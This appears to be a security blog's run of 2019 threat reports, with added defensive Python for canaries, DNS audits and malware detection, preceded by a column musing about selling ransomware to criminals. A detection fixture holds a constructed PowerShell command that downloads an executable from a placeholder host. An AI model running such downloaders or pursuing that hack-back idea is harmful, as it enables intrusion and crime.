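The practitioner’s actual tooling isn’t described, so what follows is an added illustration of the idea rather than his code. The trick only pays off if you can tell, from a login attempt alone, that the credential is one of yours and which dump it came from, so the usernames below carry a short HMAC tag derived from a secret key and the name of the place the dump was seeded; a login with that name can only come from someone who read that dump, and recomputing the tags tells you which one. The key, the site labels and the sshd-style log lines are all constructed for the example.

```python
import hashlib
import hmac
import re
import secrets

BASE_NAMES = ("jsmith", "mgarcia", "dlee", "rpatel")   # plausible-looking account stems

def canary_usernames(key: bytes, site: str, count: int):
    """Deterministic canary names for one seeding site: stem.tag, tag = HMAC(key, site|i)[:6].
    Anyone without the key cannot tell these from real accounts or forge new ones."""
    names = []
    for i in range(count):
        tag = hmac.new(key, f"{site}|{i}".encode(), hashlib.sha256).hexdigest()[:6]
        names.append(f"{BASE_NAMES[i % len(BASE_NAMES)]}.{tag}")
    return names

def mint_dump(key: bytes, site: str, count: int):
    """username:password lines to post; passwords are random and never reused anywhere real."""
    return [f"{u}:{secrets.token_urlsafe(12)}" for u in canary_usernames(key, site, count)]

def identify_canary(key: bytes, sites, count: int, username: str):
    """Return the seeding site a username belongs to, or None for a non-canary name."""
    for site in sites:
        if username in canary_usernames(key, site, count):
            return site
    return None

LOGIN_RE = re.compile(r"for (?:invalid user )?(\S+) from (\d+(?:\.\d+){3})")

def find_canary_logins(log_lines, key: bytes, sites, count: int):
    """(username, seeding site, source IP) for each auth log line that used a canary."""
    hits = []
    for line in log_lines:
        m = LOGIN_RE.search(line)
        if not m:
            continue
        user, src = m.groups()
        site = identify_canary(key, sites, count, user)
        if site:
            hits.append((user, site, src))
    return hits

KEY = b"rotate-me-this-is-only-a-demo-key"      # assumption: kept well away from the dump
SITES = ("pastebin-2019-02", "forum-x-2019-02")  # labels for where each dump was seeded

def build_sample_log(key: bytes, sites, count: int):
    """Constructed sshd-style lines: two real users and one canary from the second site."""
    canary = canary_usernames(key, sites[1], count)[0]
    return [
        "Feb  5 03:14:07 vpn1 sshd[1234]: Failed password for alice from 198.51.100.7 port 40022 ssh2",
        f"Feb  5 03:14:09 vpn1 sshd[1234]: Failed password for invalid user {canary} from 203.0.113.9 port 5122 ssh2",
        "Feb  5 03:15:00 vpn1 sshd[1240]: Accepted publickey for bob from 198.51.100.8 port 40100 ssh2",
    ]

if __name__ == "__main__":
    print("\n".join(mint_dump(KEY, SITES[0], 3)))
    for user, site, src in find_canary_logins(build_sample_log(KEY, SITES, 3), KEY, SITES, 3):
        print(f"canary {user} (seeded at {site}) tried from {src}")
```

Two practical notes. First, make sure the canary accounts do not exist anywhere they could actually authenticate; the value is in the failed attempt, not in a working login. Second, the source IP of that attempt is the pivot the practitioner describes: everything else that address touched in the SIEM around the same time is now worth a look.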

Cuthbert’s kick #3: Ripping a page out of the MPAA’s playbook

Kick #3

Remember the time that the MPAA got caught seeding fake movie torrents to expose those pesky internet pirates? Maybe they were on to something. What if we did the same thing? There’s lots of opportunity here.

How much fun could we have uploading and selling malware to miscreants? What if we sold them software that ransomed their own computers? What if we provided fake C2 infrastructure (e.g. botnets) that burned their identities? How would they be any wiser? While much of this might border on criminal activity on our own part, it’s still an innovative idea that might be worth exploring. Perhaps our fine friends in the federal government are already doing this 😉.

Cuthbert’s final kick: Killing time

The final kick

There’s one way we can all make bad guys hurt: waste their time, while not wasting our own. There are a lot of ways to do this, and I can’t wait to share a few with you. If we want to remove the appeal for these miscreants, we also need to remove their opportunity. Here are a few fun ways others have done this. (A lawyer made me say this: I would caution you not to get involved directly with any fraudster unless you know the risks involved.)

Final lesson

Virginia Hall was a notorious thorn in the side of her enemies. Anyone the Nazis call a “limping Canadian b—ch” is a sure winner in my book. While we all struggle with our common adversaries, perhaps it is time for us to think a bit more outside the box. Bad guys place enough pain on us, perhaps it’s time we think about pushing some pain back upon them 💯.

What about you? What ideas do you have? Anything innovative and fun you’ve done to kick those miscreants where the sun don’t shine? We’d love to hear!

Threat Report Wednesday January 30th 2019

on January 30, 2019

Discover a financial service data breach, a viral Apple vulnerability, the evolution of malware, and indicators related to the Iranian DNS hijacking campaign in this week’s threat report.

Discover discloses August 2018 data breach

Discover Financial Services notified customers and the California Attorney General of a data breach. On August 13, 2018, they learned that an undisclosed number of Discover card accounts may have been part of a data breach, however, the breach “did not involve Discover card systems.” The company is issuing new cards for affected customers and advises cardholders to monitor their accounts for fraudulent activity.

Discover commented, “We can confirm this incident did not involve any Discover systems and we are forwarding this to the appropriate parties for review. We’re aware of a possible merchant data breach & are monitoring accounts. Our members can rest assured they’re never responsible for unauthorized purchases on their Discover card accounts.”

The breach was filed in two separate breach notifications. The statements differ slightly in the Automatic Bills section. One titles the section “A Helpful Reminder About Automatic Bills,” and encourages users to use the included list to contact merchants that bill their card automatically or store card information. The other titles the section, “Make sure any other automatic bills get paid as easily as these,” and states that there’s no need to contact the merchants listed, but if users have other automatic bills not on the list, they should contact them and update account information accordingly. Another difference between the two is that only some customers were issued a card with a new account number, while other customers were not. It sounds like it was a breach of systems used for automated billing that are outside of Discover. Users were advised to monitor their banking statements for fraudulent activity.

Apple disables group FaceTime

Apple has disabled Group FaceTime since a severe iOS bug was disclosed via Twitter (January 28, 2019). The bug allows iPhone users to access the microphone and front-facing camera belonging to the person they are calling even if the person does not answer the call.

The flaw received global attention when Apple iPhone user Benji Mobb tweeted a video of the bug in action. Within 24 hours, the post reached 30K+ retweets and over 75K likes.

A spokesperson for Apple reported that they are aware of the issue and plan to release a software update later this week. iPhone users are advised to disable FaceTime until the latest available patch is officially released by Apple and keep software up to date in order to best mitigate risk.

BankBot Anubis learns Chinese and adds Telegram for C&C

Researchers tracking BankBot Anubis noticed two significant changes in C&C tactics. BankBot Anubis is a mobile banking trojan that targets hundreds of unique mobile applications from organizations worldwide. Researchers observed BankBot Anubis encoding C&C information using Chinese characters in addition to base64 encoding in an attempt to hide their C2 infrastructure. Also, researchers noted the use of Telegram Messenger in addition to Twitter for communicating C&C URLs. This offers BankBot the use of public channels to broadcast messages to large audiences with a public URL.

Formbook information stealer distributed through file hosting service

Deep Instinct reports sightings of attackers using a file hosting service to distribute Formbook, an information/credential stealing malware. The observed attacks began with a phishing email containing a malicious attachment. In one analyzed case, the initial infection was carried out via a malicious RTF document that exploited CVE-2012-0158 (Office ActiveX vulnerability) and CVE-2017-11882, the Equation Editor vulnerability previously used by Loki.

After the maldoc is opened, the malware is dropped and executed. It copies itself and writes an auto-run entry, ensuring persistence and boot survival on infected machines. Formbook scans the victim’s system for passwords and sends them back to its C2 server. It can also take screenshots of the victim’s desktop and log keystrokes. The domain that served the payload (files.dropmybin[.]me) was registered recently, on January 19, 2019, and sits behind Cloudflare, a popular reverse-proxy provider, to hide its real IP address. Deep Instinct notes that customers in the retail and hospitality sectors in North America have been targeted. The following indicators of compromise were released with the researchers’ findings:

AZORult masquerading as Google Update

Minerva Labs observed the AZORult information stealer and downloader malware strain posing as a signed Google Update installer on compromised machines. AZORult is a data-stealing trojan also known to act as a downloader for other malware payloads. Minerva Labs published their findings after they detected a “suspicious executable” with a valid certificate. Minerva Labs also noticed that the actors had been running the malware as a “GoogleUpdate.exe” that pretends to be the legitimate updater; however, the certificate with which the malicious file was signed did not belong to Google.

Researchers identified the camouflaged Google Update binary based on several patterns: an HTTP POST request to /index.php, use of a “.bit” domain (DNS over blockchain), and the typical User-Agent string Mozilla/4.0. Researchers note that AZORult replaces the legitimate Google Updater, which runs with administrative privileges, allowing it to establish a stealthy persistence mechanism. Users’ and organizations’ best defense against these attacks is to keep software up to date and to download applications only from legitimate stores. Here are a few of the indicators of compromise released with the report. Check out the full report for all the file hashes.

File Paths




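The three network patterns Minerva Labs lists for the disguised updater (POST to /index.php, a .bit host, a Mozilla/4.0 User-Agent) are each weak on their own, so a practical detection scores them together. The following is an added example for this report, not Minerva Labs’ or Perch’s code; the log format and every line in SAMPLE_LOG are constructed for illustration, and the weights are an assumption explained in the comments.

```python
"""Score proxy/web log lines for the AZORult patterns named in the
report: HTTP POST to /index.php, a .bit (blockchain DNS) host and a
Mozilla/4.0 User-Agent.

Added example; not Minerva Labs' or Perch's code. The log format and
every line in SAMPLE_LOG are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Constructed access log: epoch client method url status "user-agent"
SAMPLE_LOG = """\
1548860001.123 10.0.0.5 POST http://update-check.bit/index.php 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
1548860002.456 10.0.0.7 GET http://www.example.com/index.php 200 "Mozilla/5.0 (Windows NT 10.0) Firefox/64.0"
1548860003.789 10.0.0.9 POST http://legacy.example.com/index.php 200 "Mozilla/4.0 (compatible; MSIE 7.0)"
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def score_request(method, url, user_agent):
    """Weight the three patterns (weights are an assumption). A .bit host
    carries most of the weight: it cannot resolve through ordinary DNS,
    so a corporate client reaching one is anomalous on its own;
    POST /index.php and Mozilla/4.0 are common in legitimate traffic
    and only corroborate."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    score, reasons = 0, []
    if host.endswith(".bit"):
        score += 3
        reasons.append(".bit (blockchain DNS) domain")
    if method == "POST" and parts.path == "/index.php":
        score += 1
        reasons.append("POST to /index.php")
    if user_agent.startswith("Mozilla/4.0"):
        score += 1
        reasons.append("legacy Mozilla/4.0 User-Agent")
    return score, reasons


def find_suspicious(log_text, threshold=4):
    """Return the requests scoring at or above threshold. With the default
    threshold a .bit host needs one corroborating pattern, and the two
    weak patterns alone never fire."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        score, reasons = score_request(m["method"], m["url"], m["ua"])
        if score >= threshold:
            hits.append({
                "client": m["client"],
                "host": urlsplit(m["url"]).hostname,
                "score": score,
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Only the first constructed line fires: the legacy intranet client on the third line has two of the three patterns but never reaches the threshold, which is the point of weighting the .bit host above the other two.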
Iranian DNS hijacking infrastructure identified

Last week, researchers published further findings on the global DNS hijacking activity, allegedly conducted by Iran. Five attacker-owned domains were used in the clandestine change of NS records to act as nameservers and temporarily route traffic for targeted entities.

Once hijacked, targeted domains ceased resolving to their normal IP addresses and began resolving to actor-controlled infrastructure. The actors mostly used Let’s Encrypt certificates for TLS encryption. Available data shows that most affected domains were hijacked for very short periods of time, sometimes a day or less, with one domain showing resolutions to a malicious IP address for over a month. Researchers identified dates when the nameservers were used to route traffic to malicious IP addresses.

Malicious IP       | Period                         | Targeted entity
142.54.179[.]69    | February 2017                  | Jordan (Government)
89.163.206[.]26    | February 2017                  | Jordan (Government)
185.15.247[.]140   | December 2017 and January 2018 | Kuwait (Government) and Albania (Government)
146.185.143[.]158  | August 2018                    | UAE (Government)
128.199.50[.]175   | September 2018                 | UAE (Unidentified Sector)
185.20.187[.]8     | September 2018                 | UAE (Law Enforcement) and UAE (Government) and Lebanon (Government) and Lebanon (Civil Aviation)
82.196.8[.]43      | October 2018                   | Iraq (Government)
188.166.119[.]57   | October 2018 and November 2018 | Egypt (Government) and Libya (Government)
206.221.184[.]133  | November 2018                  | Egypt (Government)
37.139.11[.]155    | November 2018                  | UAE (Unidentified Sector)
199.247.3[.]191    | November 2018                  | Iraq (Government) and Albania (Government)
185.161.209[.]147  | November 2018                  | Lebanon (Insurance)
139.162.144[.]139  | December 2018                  | Jordan (Government)
37.139.11[.]155    | December 2018                  | UAE (Unidentified Sector)
178.62.218[.]244   | December 2018                  | UAE (Government) and Cyprus (Government)
139.59.134[.]216   | December 2018                  | Sweden, Saudi Arabia and Lebanon (Internet Services)
82.196.11[.]127    | December 2018                  | Sweden and U.S. (Internet Infrastructure)
46.101.250[.]202   | December 2018 and January 2019 | Saudi Arabia (Government)

This large-scale activity shows the determination of nation state actors to reroute internet traffic for surveilling targets and gleaning information from that traffic. The rerouted traffic may have been used to steal session information, access sensitive information, and/or infect victims with malware. DNS hijacking poses a risk to the users of a Web service and to the confidentiality, integrity, and availability of the data in the service behind a hijacked domain.

NS Domains

Threat Report Wednesday January 23rd 2019

on January 23, 2019

Governments around the world were busy responding to cybercrime, cyber espionage, and hacktivists last week. The U.S. Department of Homeland Security issues an emergency directive, Zimbabwe draws unwanted attention from Anonymous, the Bahamas’ government TV network struggles to recover from ransomware, an APT lures Chile’s ATM network to infection, and South Korean security controls lead to a secrets breach. Also, we’ve got a hat-trick of remote code execution going on this week: Linux, Apple, and Windows released patches for critical vulnerabilities.

Emergency directive from U.S. Homeland Security

The U.S. Department of Homeland Security (DHS) has issued an emergency directive that requires all U.S. agencies that operate with a dot gov domain or agency-managed domain to audit their DNS records and servers to verify that they are resolving to the correct IP addresses. They also require such organizations to harden the security related to DNS accounts and passwords.

The directive comes after DHS’ monitoring of an ongoing campaign where attackers are stealing DNS administrators’ credentials in order to tamper with DNS infrastructure. Attackers are then redirecting government hostnames to attackers’ IP addresses. This allows attackers to possibly redirect legitimate traffic to phishing sites where more credentials can be stolen, or to have email delivered to the attackers’ mail servers.

The links in the emergency directive indicate that these attacks are related to earlier DNS hijacks reported by Cisco Talos in December 2018 and FireEye in January 2019. In these attacks, attackers known to be affiliated with Iran were hijacking the DNS records for Middle Eastern government domains.

U.S. Government agencies are required to perform the following steps within the next 10 business days. These procedures do not currently have a termination date and will continue until a further directive is issued:

  1. Audit DNS records associated with government domains to verify that they have not been tampered with and are directing traffic to the correct IP addresses.
  2. Change the passwords for DNS admin accounts that modify DNS records.
  3. Add multi-factor authentication to all DNS admin accounts.
  4. Begin to monitor the Certificate Transparency (CT) logs for agency domains that will be provided by DHS within the next 10 business days.
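Step 1 of the directive (verify that records still resolve where they should) and the hijacking timeline in the previous report (resolutions moved to actor IPs for days at a time, sometimes a single day) are both served by the same check: diff a resolver snapshot against a baseline kept outside DNS, and scan a resolution history for runs that land on known actor infrastructure. The following is an added example for this report, not code from Perch, DHS or the researchers; the zone names (example.gov), baseline, snapshots and history are constructed, and only the two indicator IPs are taken from the table above.

```python
"""Audit DNS records against a known-good baseline and a list of
actor-controlled IPs, then look for short-lived hijack windows in a
resolution history.

Added example for the Perch threat report; not code from Perch, DHS or
the researchers. All snapshots, hostnames (example.gov) and the
baseline are constructed; the two indicator IPs come from the
hijacking table in the report above.
"""
from dataclasses import dataclass

# Known-good baseline, kept outside DNS itself (assumption: each agency
# maintains such a record of its NS and A values).
BASELINE = {
    "example.gov": {
        "NS": {"ns1.example.gov.", "ns2.example.gov."},
        "A": {"203.0.113.10"},
    },
    "mail.example.gov": {"A": {"203.0.113.25"}},
}

# Actor-controlled IPs from the report's table (undefanged here).
INDICATOR_IPS = {"185.20.187.8", "146.185.143.158"}

# Constructed dig-style answer sections: one clean, one with the mail
# host pointed at actor infrastructure.
CLEAN_SNAPSHOT = """\
example.gov.       3600 IN NS ns1.example.gov.
example.gov.       3600 IN NS ns2.example.gov.
example.gov.        300 IN A  203.0.113.10
mail.example.gov.   300 IN A  203.0.113.25
"""
HIJACKED_SNAPSHOT = """\
example.gov.       3600 IN NS ns1.example.gov.
example.gov.       3600 IN NS ns2.example.gov.
example.gov.        300 IN A  203.0.113.10
mail.example.gov.   300 IN A  185.20.187.8
"""

# Constructed daily resolution history for mail.example.gov.
HISTORY = [
    ("2018-08-01", "203.0.113.25"), ("2018-08-02", "203.0.113.25"),
    ("2018-08-03", "203.0.113.25"), ("2018-08-04", "185.20.187.8"),
    ("2018-08-05", "185.20.187.8"), ("2018-08-06", "203.0.113.25"),
]


@dataclass
class Finding:
    name: str
    rtype: str
    expected: set
    observed: set
    reason: str


def parse_snapshot(text):
    """Parse 'name TTL IN TYPE value' lines into {name: {rtype: set(values)}}.
    Trailing dots on owner names are dropped; NS targets keep theirs."""
    observed = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[2] != "IN":
            continue
        name, rtype, value = parts[0].rstrip("."), parts[3], parts[4]
        observed.setdefault(name, {}).setdefault(rtype, set()).add(value)
    return observed


def audit(observed, baseline=BASELINE, indicators=INDICATOR_IPS):
    """Return a Finding for every baseline record whose observed value set
    differs; a name missing from the snapshot counts as drift too."""
    findings = []
    for name, rtypes in baseline.items():
        for rtype, expected in rtypes.items():
            got = set(observed.get(name, {}).get(rtype, set()))
            if got != expected:
                reason = "record drift"
                if got & indicators:
                    reason = "resolves to known actor infrastructure"
                findings.append(Finding(name, rtype, expected, got, reason))
    return findings


def hijack_windows(history, indicators=INDICATOR_IPS):
    """Given [(date, ip), ...] sorted by date for one host, return
    [(first_seen, last_seen, ip)] for each run of resolutions to an
    indicator IP. A one-day window is easy to miss in a weekly check."""
    windows, current = [], None
    for date, ip in history:
        if ip in indicators:
            if current and current[2] == ip:
                current[1] = date
            else:
                if current:
                    windows.append(tuple(current))
                current = [date, date, ip]
        elif current:
            windows.append(tuple(current))
            current = None
    if current:
        windows.append(tuple(current))
    return windows


if __name__ == "__main__":
    for f in audit(parse_snapshot(HIJACKED_SNAPSHOT)):
        print(f"{f.name} {f.rtype}: expected {sorted(f.expected)}, "
              f"observed {sorted(f.observed)} ({f.reason})")
    print(hijack_windows(HISTORY))
```

The baseline comparison catches a changed or missing record regardless of where it now points; the indicator match only upgrades the reason. Run against a daily passive-DNS export rather than a single live query, the window scan is what surfaces the one-day hijacks the researchers describe.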

#OpZimbabwe underway

International hacktivist group Anonymous targeted the Zimbabwe government after it attempted to halt nationwide protests through various means, including blocking social media sites. Here is an excerpt from the tango down:

“We have seen people being oppressed for fighting for freedom. We cannot tolerate that. As we did with the Sudanese government, we have successfully taken down 72+ Zimbabwe government websites. This is only a start. Your banking system will also fall soon. Zimbabwe government, you have become an enemy of Anonymous! Your systems are in danger!”

According to Bloomberg, the protests have been directed towards a 150 percent hike in the price of diesel and gasoline, police crackdowns resulting in the death of 12 people, and legal action directed at the three mobile networks to block access to Facebook, WhatsApp, YouTube, and Twitter. Some of the websites which have been targeted by Anonymous are: Ministry of ICT, Housing Ministry, Justice Department, and Ministry of Defense. The group reportedly attacked more than 200 websites in Sudan and government services for electronic payments.

PowerRatankba infiltrates Interbank ATM network via LinkedIn and Skype

Meanwhile in Chile, new information is coming out about an intrusion impacting the bank responsible for the country’s ATM network. Redbanc is an interbank network in Chile connecting the ATMs of all its banks. Earlier this month, it was reported they suffered an intrusion. Hackers created a watering hole to lure software developers by posting a sweet job opportunity on LinkedIn. When a Redbanc employee responded to the job opportunity, they were invited to a Skype interview. There they were instructed to download ApplicationPDF.exe, which contained malware. Redbanc did detect malware activity, allowing them to respond before attackers could learn the network and do more damage. This shows the value of monitoring your network to detect threats early, before they mature. Researchers at Flashpoint provided a great malware analysis of the samples from Redbanc and believe Lazarus, aka Hidden Cobra, is responsible.

TV network take over in the Bahamas

Like a scene out of a cult classic, hackers have taken over the TV network infrastructure of the Broadcasting Corporation of the Bahamas (BCB). Much of the station’s IT infrastructure is unavailable as hackers hold the computer network for ransom. The ransomware infiltration was nearly complete in scope. The attackers initially asked for 50,000 dollars in cryptocurrency (approximately 15 bitcoin) but have been willing to negotiate down to 18,000. Although recovery is expected to cost hundreds of thousands of dollars, paying the ransom has been declared off the table.

As reported by EW News Online, The Democratic National Alliance (DNA) expressed that it is gravely concerned about recent reports regarding a cyberattack on the Broadcasting Corporation of the Bahamas (BCB), and Bahamians being left in the dark as it relates to getting an update. DNA’s Spokesperson for Information Technology, Samuel Strachan, outlined that no further updates have been provided to the Bahamian people and fundamental questions remain unanswered by a government that professes a commitment to transparency and accountability. I reached out to BCB earlier in the week for clarification on some of the breach details, but I have received no update.

South Korea was hacked. Who done it?

According to multiple South Korean news sources, attackers successfully infiltrated the computer systems of a South Korean government agency on October 4, 2018, infecting 30 computers and stealing internal documents from at least 10. The breached organization was South Korea’s Defense Acquisition Program Administration (DAPA), an agency responsible for weaponry and munitions acquisitions for the country’s military forces. The stolen documents reportedly contained information on arms procurement for the country’s next generation fighter aircraft.

Ironically, attackers were able to infiltrate the system by first gaining access to the server of a security program installed on all government computers. The infected application was a “Data Storage Prevention Solution” installed on South Korean government computers to prevent sensitive documents from being downloaded and saved on internet-connected PCs. Upon gaining administrative access to the software’s server, attackers used it to collect documents from connected workstations. I’ll go out on a limb and say this was North Korea.

Linux, Apple, and Microsoft plug critical code execution holes

Linux, Apple, and Microsoft are patching some critical vulnerabilities that allow for remote code execution (RCE).

Linux package manager APT released a patch for a remote code execution vulnerability that allows a man-in-the-middle to execute arbitrary code as root on a machine installing any package. “Unfortunately, the HTTP fetcher process URL-decodes the HTTP Location header and blindly appends it to the 103 Redirect response,” explained Justicz in his post. “Since the attacker controls the reported hashes, they can use this vulnerability to convincingly forge any package.” The flaw (CVE-2019-3462) has been fixed in the latest versions of the package manager, and Debian, which develops APT, has acknowledged it. Justicz also advises users to disable HTTP redirects when updating; this neutralizes the flaw until the fixed APT package is installed.
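The quoted sentence describes a classic injection into a line-oriented internal protocol: a value that is URL-decoded and then written into a “Key: value” message without checking for the newline that separates fields and messages. The block below is an added example, not APT’s code: it models such a protocol in a few lines, shows the bug pattern beside the hardened handling, and is a constructed illustration (message codes, field name and URLs are assumptions borrowed only in shape from the quote).

```python
"""Simplified model of a line-oriented fetcher protocol, showing why a
URL-decoded Location header must be validated before it is placed into
a protocol message.

Added example, not APT's code: the '103 Redirect' / 'New-URI' message
shape mirrors the quote in the report, but the parser and both handlers
below are a constructed illustration.
"""
from urllib.parse import unquote, urlsplit


class UnsafeRedirect(ValueError):
    """Raised when a decoded redirect target cannot be safely embedded."""


def parse_messages(text):
    """Parse 'CODE Description' blocks of 'Key: value' lines separated by
    blank lines into [(code, {key: value}), ...]. Like any such protocol,
    it trusts that a value never contains a newline."""
    messages = []
    for block in text.strip().split("\n\n"):
        lines = block.splitlines()
        code = int(lines[0].split()[0])
        fields = {}
        for line in lines[1:]:
            key, _, value = line.partition(": ")
            fields[key] = value
        messages.append((code, fields))
    return messages


def redirect_message_naive(location_header):
    """The bug pattern from the report: decode the header and append it
    to the message unchecked. An encoded newline in the header therefore
    ends the redirect message early and starts a new one."""
    return "103 Redirect\nNew-URI: " + unquote(location_header) + "\n\n"


def safe_redirect_target(location_header):
    """Hardened handling: decode, then refuse any control character (CR,
    LF and friends) that could end the field or message early, and
    require an absolute http(s) URL."""
    target = unquote(location_header)
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        raise UnsafeRedirect("control character in redirect target")
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise UnsafeRedirect("redirect target is not an absolute http(s) URL")
    return target


def redirect_message_safe(location_header):
    """Same message, built only from a validated target."""
    return "103 Redirect\nNew-URI: " + safe_redirect_target(location_header) + "\n\n"
```

With the naive handler, a Location value carrying a percent-encoded newline is parsed as two messages, the second entirely attacker-chosen; the hardened handler rejects the value before it reaches the protocol. Validation belongs at the decode boundary, not in the parser, because the parser has no way to tell an injected line from a real one. For the workaround the post recommends, the apt.conf setting that turns off redirect following is `Acquire::http::AllowRedirect "false";` (a real apt option; the report itself only says to disable redirects).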

Apple has released patches for a number of vulnerabilities, but notable among them is a vulnerability in WebRTC that opens the door for an RCE over FaceTime and a vulnerability that allows Bluetooth connections to be intercepted and used for RCE on the device. Since it’s 2019, you can buy working exploits for either of these vulnerabilities for as low as $4,999.99. What a world we live in.

Microsoft has released temporary patches for three Windows zero-days, all of which were disclosed within the past month. The first received a temporary patch last week, while patches for the other two followed this week. ZDNet notes that Microsoft did not release official fixes at the start of the month during its January 2019 Patch Tuesday, and that the patches have instead been made available by a third-party security firm. In order to install the temporary patches, users must install 0patch Agent from Acros Security, software primarily designed for companies that use old Windows versions across their system, versions that have reached their End-Of-Life (EOL) and are no longer receiving official security updates from Microsoft.

The first zero-day is a flaw within Windows ReadFile, whereby malicious code can abuse the Windows ReadFile OS function to read any local file, regardless of the user’s permission level. It was disclosed on December 20, 2018.

The second zero-day is a Windows WER flaw, aka AngryPolarBug, whereby malicious code can overwrite and replace any file on the user’s system. It was disclosed on December 27, 2018.

The third zero-day is in Windows VCF (Contacts), whereby malicious code abuses the way Windows reads vCard files (VCFs) to execute code on the computer with elevated privileges. It was disclosed on January 10, 2019.

None of the three Windows zero-days have been observed being used in the wild by any malware author or cybercriminal group. Users and organizations are advised to update their Windows products with the latest available patches to mitigate risk and remain on watch for more permanent patches.

Link High Technologies and Perch Security Partner to Bring Added Security to MSP Clients

Perchy on January 17, 2019

Link High Technologies, a cybersecurity and compliance focused IT management provider, is excited to announce its partnership with Perch Security. Through this partnership, Link High’s information security offerings will now include Perch Security’s next generation threat intelligence platform and Security Operations Center (SOC) services.

Access the rest of the article here.

Threat Report Wednesday January 16th 2019

on January 16, 2019

A lot has happened over the last week, so we have a bit more to cover than usual. The malspam campaigns are getting more creative than ever and some recent news about Ryuk ransomware attribution could have a big impact on your cyber insurance coverage.

Love-Letter malspammer, “always thinking about you”

With Valentine’s day right around the corner, the “Love Letter” malspam campaign is using email subject lines engineered to tug users’ heartstrings into infection with GandCrab Ransomware, XMRig miner, and Phorpiex spambot. Here were some example subject lines:

  • This is my love letter to you
  • My love letter for you
  • Wrote the fantasy about us down
  • Always thinking about you

The campaign contains ZIP attachments, which contain a JavaScript file that runs a PowerShell command, resulting in a download of an executable named “krablin.exe” from “”. Once executed, the malware copies itself to “%UserProfile%\[number]\winsvcs.exe”, downloads five other malware samples to the infected machine, and executes them. Users should always be cautious with email content that pretends to come from a legitimate company and asks for personal information. The following indicators of compromise were released by Bleeping Computer.
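The chain above (lure subject with a ZIP, the JavaScript inside it spawning a PowerShell downloader, then a copy to a numbered folder under the user profile) gives three narrow, stage-specific detections. The following is an added example for this report, not Bleeping Computer’s or Perch’s code; the event records, the user name, the folder number and the `[placeholder-host]` download URL are constructed for illustration.

```python
"""Detection logic for the 'Love Letter' chain: a lure subject with a
ZIP attachment, a script host spawning a PowerShell downloader, and
winsvcs.exe written to a numbered folder under the user profile.

Added example; not Bleeping Computer's or Perch's code. The event
records, user name, folder number and the [placeholder-host] download
URL are constructed for illustration.
"""
import re

LURE_SUBJECTS = {
    "this is my love letter to you",
    "my love letter for you",
    "wrote the fantasy about us down",
    "always thinking about you",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)
# %UserProfile%\[number]\winsvcs.exe, the copy path the report describes.
WINSVCS_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\\d+\\winsvcs\.exe$", re.I)

# Constructed events from mail gateway, process-creation and file-create
# telemetry (not real logs).
EVENTS = [
    {"kind": "mail", "subject": "Always thinking about you",
     "attachment": "Love_You_5213.zip"},
    {"kind": "process",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden (New-Object Net.WebClient)"
                ".DownloadFile('http://[placeholder-host]/krablin.exe','krablin.exe')"},
    {"kind": "file", "path": r"C:\Users\alice\5213\winsvcs.exe"},
    {"kind": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    {"kind": "file", "path": r"C:\Users\alice\Documents\report.docx"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return a reason string if the event matches one stage of the chain,
    else None. Each rule is narrow on purpose: PowerShell by itself or a
    ZIP attachment by itself is normal in most environments."""
    kind = event["kind"]
    if kind == "mail":
        if (event["subject"].strip().lower() in LURE_SUBJECTS
                and event.get("attachment", "").lower().endswith(".zip")):
            return "love-letter lure subject with zip attachment"
    elif kind == "process":
        if (_basename(event["parent"]) in SCRIPT_HOSTS
                and _basename(event["image"]) == "powershell.exe"
                and DOWNLOAD_RE.search(event["cmdline"])):
            return "script host launched powershell downloader"
    elif kind == "file":
        if WINSVCS_RE.match(event["path"]):
            return "winsvcs.exe dropped in numbered profile folder"
    return None


def scan(events):
    """Return [(index, reason)] for every matching event, in order."""
    hits = []
    for i, event in enumerate(events):
        reason = classify(event)
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == "__main__":
    for i, reason in scan(EVENTS):
        print(i, reason)
```

The process rule is the one that generalizes: wscript or cscript launching PowerShell with a download cmdlet is a pattern shared by many ZIP-and-JavaScript malspam families, so it keeps firing after the subject lines and file names of this campaign have changed.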

Email Addresses 

IP Addresses 



Mjag pairs up with Punisher RAT

Security firm Zscaler released a report on a dropper variant dubbed “Mjag” that uses decoy documents to deliver a Remote Access Trojan (RAT). Mjag dropper is compiled in the Microsoft .NET framework and its original binary is obfuscated using Smart Assembly. Zscaler published the findings after they detected an infection cycle involving Punisher RAT. The RAT is publicly available and can be configured with a range of features: a password-stealing module, anti-task manager, keylogging, persistence, a spreading vector, and AV checks. The following indicators of compromise were released with these findings.


DarkHydrus grows back new heads in on-going Middle East campaign

The DarkHydrus campaign reemerged and is targeting Middle East entities. 360 Threat Intelligence Center identified that the attackers use VBA macros in the dropper, with DNS tunneling for C2 communication. The malware was uploaded to VirusTotal from Oman.


IP Addresses 

Ryuk moves to Russia with Grim Spider

Multiple security intelligence communities, like CrowdStrike, report that Ryuk ransomware is most likely the creation of Russian financially-motivated cybercriminals, not North Korean state-sponsored attackers. The clarification came after several news outlets attributed a Ryuk ransomware infection targeting U.S. newspaper agencies to North Korean attackers. We have previously reported on Ryuk activities and the U.S. newspaper hack.

